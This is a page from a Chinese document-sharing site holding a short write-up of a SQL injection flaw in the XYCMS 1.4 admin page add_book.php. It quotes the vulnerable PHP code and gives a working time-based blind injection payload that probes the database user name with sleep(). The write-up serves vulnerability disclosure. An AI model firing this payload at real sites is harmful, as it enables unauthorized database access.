没有合适的资源?快使用搜索试试~ 我知道了~
xycms add_book.php sql注入漏洞1
需积分: 0 4 下载量 49 浏览量
2022-08-03
20:08:28
上传
评论
收藏 1.03MB PDF 举报
温馨提示
试读
2页
漏洞简介:XYCMS原名为南京XYCMS企业建站系统,所设计的版本分为动态版和静态版。这里发现 reply_content 里面的参数没有进行任何过滤,直接po
资源推荐
资源详情
资源评论
xycms add_book.php sql注入漏洞
漏洞简介:
XYCMS原名为南京XYCMS企业建站系统,所设计的版本分为动态版和静态版。 XYCMS(PHP版)1.4版
本 add_book.php 页面存在 sql注入漏洞
##漏洞分析 看 www/admin/add_book.php 文件 106行
这里发现 reply_content 里面的参数没有进行任何过滤,直接post请求带入数据库查询,导致sql注
入。
漏洞复现
payload:
post: http://localhost/admin/add_book.php?act=ok
<?php
if($_GET["act"]==ok){
$c_file_path=md5(numRandomString(16));
$siteinfo = array(
'title' => $_POST['title'],
'content' => $_POST['ly_content'],
'reply_content' => $_POST['content'],
'c_order' => $_POST['c_order'],
'is_view' => $_POST['is_view'],
'c_date' => strtotime($_POST['c_date'])
);
$db->insert("xy_book", $siteinfo);
//$db->close();
echo "<script language='javascript'>";
echo "alert('恭喜您,信息内容添加成功!');";
echo " location='manage_gbook.php';";
echo "</script>";
}
?>
title=11&ly_content=11&content=11' AND (select
if(mid(user(),1,1)='r',sleep(5),0)),'1','1','1')#&c_date=2017-06-
20&c_order=1&is_view=1
资源评论
AshleyK
- 粉丝: 18
- 资源: 315
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功